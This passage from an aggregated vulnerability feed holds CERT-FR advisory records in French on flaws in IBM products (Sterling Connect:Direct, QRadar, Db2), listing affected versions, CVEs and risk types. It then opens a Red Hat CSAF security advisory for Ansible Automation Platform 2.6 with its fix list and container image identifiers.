"description": "Sterling Connect:Direct versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.2.iFix004 pour Unix",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP14",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Qradar Hub versions ant\u00e9rieures \u00e0 3.9.0",
"product": {
"name": "QRadar Hub",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.5.iFix008 pour Unix",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Incident Forensics versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP14",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2025-54389",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54389"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2022-26336",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26336"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2025-38464",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38464"
},
{
"name": "CVE-2025-38211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38211"
},
{
"name": "CVE-2023-45145",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45145"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2025-38332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38332"
},
{
"name": "CVE-2025-8713",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8713"
},
{
"name": "CVE-2025-36007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36007"
},
{
"name": "CVE-2012-0868",
"url": "https://www.cve.org/CVERecord?id=CVE-2012-0868"
},
{
"name": "CVE-2025-48989",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48989"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2024-21096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21096"
},
{
"name": "CVE-2019-10130",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10130"
},
{
"name": "CVE-2025-8714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8714"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2025-36137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36137"
},
{
"name": "CVE-2025-40909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40909"
},
{
"name": "CVE-2025-38477",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38477"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2025-8058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8058"
},
{
"name": "CVE-2017-7484",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7484"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
}
],
"initial_release_date": "2025-10-31T00:00:00",
"last_revision_date": "2025-10-31T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0947",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-10-31T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-10-30",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7249678",
"url": "https://www.ibm.com/support/pages/node/7249678"
},
{
"published_at": "2025-10-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7249277",
"url": "https://www.ibm.com/support/pages/node/7249277"
},
{
"published_at": "2025-10-30",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7249661",
"url": "https://www.ibm.com/support/pages/node/7249661"
},
{
"published_at": "2025-10-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7249276",
"url": "https://www.ibm.com/support/pages/node/7249276"
}
]
}
CERTFR-2025-AVI-0861
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.4.x antérieures à 6.4.0.4 | ||
| IBM | Db2 | DB2 Data Management Console on CPD versions 4.8.8 et 5.x antérieures à CPD 5.2.0 | ||
| IBM | Db2 | DB2 Data Management Console versions antérieures à 3.1.13.1 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.15 | ||
| IBM | N/A | Db2 Intelligence Center versions 1.1.x antérieures à 1.1.2.0 |
| Title | Publication Time | Tags | ||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.4",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console on CPD versions 4.8.8 et 5.x ant\u00e9rieures \u00e0 CPD 5.2.0",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console versions ant\u00e9rieures \u00e0 3.1.13.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.15",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Intelligence Center versions 1.1.x ant\u00e9rieures \u00e0 1.1.2.0",
"product": {
"name": "N/A",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-46175",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-46175"
},
{
"name": "CVE-2022-41725",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41725"
},
{
"name": "CVE-2024-22243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22243"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2025-57810",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57810"
},
{
"name": "CVE-2020-8565",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8565"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2019-11250",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11250"
},
{
"name": "CVE-2023-24532",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24532"
},
{
"name": "CVE-2022-41724",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41724"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2025-41249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41249"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2024-22259",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22259"
},
{
"name": "CVE-2022-41723",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41723"
},
{
"name": "CVE-2022-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1471"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
}
],
"initial_release_date": "2025-10-10T00:00:00",
"last_revision_date": "2025-10-10T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0861",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-10-10T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-10-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247430",
"url": "https://www.ibm.com/support/pages/node/7247430"
},
{
"published_at": "2025-10-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247086",
"url": "https://www.ibm.com/support/pages/node/7247086"
},
{
"published_at": "2025-10-06",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247188",
"url": "https://www.ibm.com/support/pages/node/7247188"
},
{
"published_at": "2025-10-07",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247285",
"url": "https://www.ibm.com/support/pages/node/7247285"
},
{
"published_at": "2025-10-07",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247283",
"url": "https://www.ibm.com/support/pages/node/7247283"
},
{
"published_at": "2025-10-08",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7247431",
"url": "https://www.ibm.com/support/pages/node/7247431"
}
]
}
rhsa-2025:19221
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.6",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for\nbuilding, deploying and managing IT automation at scale. IT Managers can\nprovide top-down guidelines on how automation is applied to individual\nteams, while automation developers retain the freedom to write tasks that\nleverage existing knowledge without the overhead. Ansible Automation\nPlatform makes it possible for users across an organization to share, vet,\nand manage automation content by means of a simple, powerful, and agentless\nlanguage.\n\nUpdate(s) and Fix(es):\n\n* Fixes issue that prevents SAML and AzureAD authentication when local user accounts share the same email address (AAP-56518)\n* Updated error handling in the Authenticator form to match other forms in the Platform UI. API errors for specific fields are correctly mapped to the form fields in the UI (AAP-56356)\n* Fixed issue with the lightspeed containers configuration when running installation for the second time over the existing AAP (AAP-56263)\n* Changes in the deployment and nginx configuration now allow for gunicorn and daphne to bind to :: as well, essentially allowing for seamlessly binding to IPv4 and IPv6 (dual-stack) addresses, while also enabling the operator to run in single-stack IPv6 or IPv4 scenarios (AAP-56192)\n* Update autocomplete settings (AAP-55783)\n* Fix an issue when restoring an upgraded AAP environment from 2.4 (AAP-55648)\n* Fixed a bug where the user could set an image without the respective version, causing the installation to enter an error loop (AAP-55642)\n* Fixed a bug that caused a failure to gather the job data from the controller API (AAP-55632)\n* Address the duplication issue by adding labels (AAP-55621)\n* Fixed Platform Auditor to view controller settings (AAP-55607)\n* Fixed an issue where setting automationgateway_disable_https=false resulted in install failure (AAP-55466)\n* Set REDHAT_CANDLEPIN_VERIFY to correct CA pem so that controller can make requests to subscription.rhsm.redhat.com (AAP-55183)\n* Set REDHAT_CANDLEPIN_VERIFY to correct CA pem so that controller can make requests to subscription.rhsm.redhat.com (AAP-55180)\n* Added a step in the subscription wizard that allows the user to configure automation analytics (AAP-55094)\n* Added postgres_extra_settings to AAP operators to apply postgresql configuration file level changes to managed postgres (AAP-55053)\n* Subscription credentials can no longer be viewed/edited from the system settings page (AAP-55014)\n* Add support for Red Hat username and password for the subscription management API (AAP-54975)\n* Fixes system_administrator role creation race condition which most commonly happened on new openshift deployments resulting in the default instance group not being created (AAP-54963)\n* Fixed issue where RESOURCE_KEY SECRET_KEY was not updated when restoring from a different environment (AAP-54942)\n* Updated ansible-builder and ansible-navigator to use EE images from ansible-automation-platform-26 namespace by default (AAP-54934)\n* Fix the permission list when creating a custom role and selecting the Automation Decisions project or credential types (AAP-54756)\n* Settings display \"Red Hat\" consistently in the API and UI (AAP-54276)\n* Fix _ui/v2/ user detail displays data correctly (AAP-54260)\n* Fix Ansible Lightspeed API version during AAP idle (AAP-54174)\n* Fix error in lightspeed service when upgrading from AAP 2.5 to AAP 2.6 (AAP-54064)\n* Fix \"Load More\" in Authentication Mapping Role dropdown doesn\u0027t work (AAP-54049)\n* Replaced dropdown type for decision environments on the rulebook activation form so that when there are no decision environments available, dropdown displays \"No results found\" instead of an empty dropdown (AAP-53844)\n* This version of receptor addresses improves stability on long-running jobs, clusters under heavy load and network flakiness (AAP-53742)\n* Axios package version was updated (AAP-53718)\n* Component label for Platform Auditor role was fixed to display all components (AAP-53551)\n* Fixed an issue where automation gateway\u0027s envoy.log did not receive logs after it was rotated (AAP-51779)\n* Topology layout and full screen mode were fixed (AAP-51106)\n* Empty strings are no longer displayed in the extra variables field on the Jobs \u003e Details page (AAP-49448)\n* Added two new toggle options on the subscription wizard to allow for fetching subscriptions using basic authentication (AAP-47865)\n* Controller Red Hat Ansible Automation Platform now works with ansible.platform collection (AAP-41000)\n* Fixed default execution environment selection in the automation settings page (AAP-39321)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2025:19221",
"url": "https://access.redhat.com/errata/RHSA-2025:19221"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-58754",
"url": "https://access.redhat.com/security/cve/CVE-2025-58754"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59343",
"url": "https://access.redhat.com/security/cve/CVE-2025-59343"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-59682",
"url": "https://access.redhat.com/security/cve/CVE-2025-59682"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9907",
"url": "https://access.redhat.com/security/cve/CVE-2025-9907"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-9908",
"url": "https://access.redhat.com/security/cve/CVE-2025-9908"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2025/rhsa-2025_19221.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.6 Container Release Update",
"tracking": {
"current_release_date": "2025-10-30T13:02:49+00:00",
"generator": {
"date": "2025-10-30T13:02:49+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.10"
}
},
"id": "RHSA-2025:19221",
"initial_release_date": "2025-10-28T21:16:15+00:00",
"revision_history": [
{
"date": "2025-10-28T21:16:15+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2025-10-28T21:16:23+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-10-30T13:02:49+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3Adae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Aaacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Afbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3A4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3A703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3Ac50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Aa13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"product_identification_helper": {
